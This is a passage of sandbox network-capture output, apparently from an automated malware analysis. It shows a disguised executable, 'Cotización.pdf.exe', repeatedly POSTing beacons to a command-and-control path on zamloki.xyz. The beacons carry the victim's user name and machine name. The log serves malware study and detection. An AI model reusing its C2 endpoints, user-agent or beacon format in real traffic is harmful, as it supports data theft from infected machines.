                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F3ZHdzH8qoc4jCdShfOy8fnL0ftlr9kEaG%2BEMQOHjI69nQRYPCPUPhKO6aVMgguwZDP3ISUaryESVthaorBWtBlo80Un0zEmNMIUwPdXkBltlH%2BLFrVXwufEP8DGig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f149d6ac295-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    41 | 192.168.2.3 | 49778 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:12.481129885 CEST | 5538 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:12.499186993 CEST | 5538 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:12.756139994 CEST | 5539 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W%2FsKICPhpl5fA%2FAdg6VoQ0%2B%2FGHIAddCczlrykwacZhMZ1FiE6wO0UXnc%2BkuPl%2B6hW%2FkqyaqcG3p4L6KbguZGWEAFGMP4c2ZiT%2FpvbZOy8CrFiYntbUsxkX5chhAFhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f181c841f4d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    42 | 192.168.2.3 | 49779 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:13.166939974 CEST | 5540 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:13.187946081 CEST | 5541 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:13.445174932 CEST | 5541 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i2RJ3WVkJF9EgnBrD1Se4kOQ%2F51VvwM3x%2BoeXBP0CrNwFmZg0mu9wwZNPz2w20IHzJg4uRV5FhBjS%2BB3MbLgGv7c%2Fok14GNRa8fPwTKpic9ItomsaB2lU%2BYEJ%2BHC5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f1c6b9296b0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    43 | 192.168.2.3 | 49780 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:13.720335960 CEST | 5542 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:13.738449097 CEST | 5542 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:14.001080036 CEST | 5543 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oZKU5J2lr%2FFFxeLrOysW957Suec%2Fl8%2F6dAUlaop%2F%2FV7M7NyfDpkK81Y65Men3%2Bms2AKRP2srWXVXhwx7p9BF%2BzWYw2PD7SgUTcIdCsYfQdzip%2B1LRKIRaZ879oLuNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f1fd90ddfa5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    44 | 192.168.2.3 | 49781 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:14.234800100 CEST | 5544 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:14.257570028 CEST | 5544 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:14.504000902 CEST | 5545 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UcbVjCs%2F9eWnh%2FOobJZRen8SawOrdzI%2FDaEhqePAIkyxetOv3AEjewmMJOxFL8tIMi2yVUr8%2Fddfp2YDrBXbfRA0GT%2BTPrRenn19aktk2q3CqvtMu5Mkmt12gXU4%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f23091c536a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    45 | 192.168.2.3 | 49782 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:14.826379061 CEST | 5546 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:14.844070911 CEST | 5546 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:15.105043888 CEST | 5547 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SBjDBXwQBkEhAMTocSECGmTPwmZYMxMf2GdTu6CTUaWwRLQjpqLdOmnXOnGO4zU2W7VQUQfTHtnL7WLTpD4fg%2Fi0AgvmzNmXyNGvAX2aGt%2BRSQyyLk4S1rQUvILpQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f26bb5c4e07-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    46 | 192.168.2.3 | 49783 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:15.344614983 CEST | 5548 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:15.365585089 CEST | 5548 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:15.613753080 CEST | 5549 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BiLblw96s%2BpJCgBzp5EqrmEI52XmCjnycVwEvVzGG4dimzw1Z5NkqaHFy8KNCmZ0I2jZDooedrmopL7O3Q0kC2wusQ%2FuWpC52R8ozjafg56qhUaPizPy8ykmeskofQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f29fc3e325c-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    47 | 192.168.2.3 | 49784 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:15.887511969 CEST | 5550 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:15.905441999 CEST | 5550 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:16.152909994 CEST | 5551 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3Mqjss8YMwii3fpFXWDyiKf3GpbVJI9XfCVi7G79hpE7zS5cG5VYUGEt%2FDreKne6u0qSLVWf5q8qFNA1AULfnUKLdakK%2B1KTFHKMYcD9V5NykAmTTs3wSovWfUd48w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f2d59dc4eb5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    48 | 192.168.2.3 | 49785 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:16.407556057 CEST | 5552 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:16.428200960 CEST | 5552 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:16.737401962 CEST | 5553 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JRHf%2F72c6f4kmZcDOpxn4J9lymdqDT7kgJ%2BAjQv1DMYe5Jt9iXko9FjTHvTanAW8VV6nNVfEAb45XBeRVV4iZvv%2FiXynhUj3%2FpVzb2jqkLSIOGMPpyURCHrcZCqpBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f309fb618e5-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    49 | 192.168.2.3 | 49786 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:16.967062950 CEST | 5553 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:16.985224009 CEST | 5554 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:17.311373949 CEST | 5554 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JmNTZQkcUw8%2F%2BJccyYVD5%2FTJEJZdNE7UKX6mWzcgJsWhwPOhdJWWmr7SpmdP3Oe%2FO2H%2BeVJTgcwzxVhrcYVpf0M%2Fe6NNDEnwfmwa8RYLuYphU4yDddYdK6J2ryyoCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f341b6d4a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    5 | 192.168.2.3 | 49732 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:50.685571909 CEST | 1284 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:50.705589056 CEST | 1284 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:50.964174032 CEST | 1285 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6QiUXwGm%2BSB7phd9TIMgyywpFBOQ1150bkCqeJT7VRV7L0ypEV9mtiJwg2PGdebNqSi4jGGrU6CAMhx8qoZ%2FFYyj6j%2BVct5zobbDfptUHUV5oCl0hBpvnAj2MNCVDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e8fd81e05b3-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    50 | 192.168.2.3 | 49787 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:17.585324049 CEST | 5555 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:17.606148958 CEST | 5556 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:17.856173992 CEST | 5556 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WH48qlpx84pqvmLb1NocFSf8j1w03u%2B0i%2B1DxXMO6KndDehoFRrp%2BjTGVtxNNVL7ZJT5C4nZ9gRo6KV5xHOgX2EDjhCBnCLACCgJo0v6C%2Bj%2FAu75E4%2Bxh9JzmIx6JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f37fe0b16ea-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    51 | 192.168.2.3 | 49788 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:18.113141060 CEST | 5557 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:18.149224043 CEST | 5557 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:18.402647018 CEST | 5558 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3hPrdG89ji6inTdiM09NUU%2BZNFWI96kVruwp9r7QDUQeFdlj7Y7N4vwax559bdBdOt6fF8j0BgRoJZwFtbfZPFLiHOcdKdbhsib0lM654Jh7tR9TnGH74fcTCOrKmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f3b4d4a4ddc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    52 | 192.168.2.3 | 49789 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:18.699980021 CEST | 5559 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:18.720247984 CEST | 5559 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:18.968704939 CEST | 5560 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9kZWps58Fi225qP0LV3rm1i%2FN8y1h03gRZmXAecO0lQr4Z5AwwUyZNSZh8xp7legzoeVuruAMJugwR80%2FliXyL%2BnqSNEzWXahxllgkAa3IGQqzSvOr4lczcg4%2FWk0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f3efa944e79-FRA
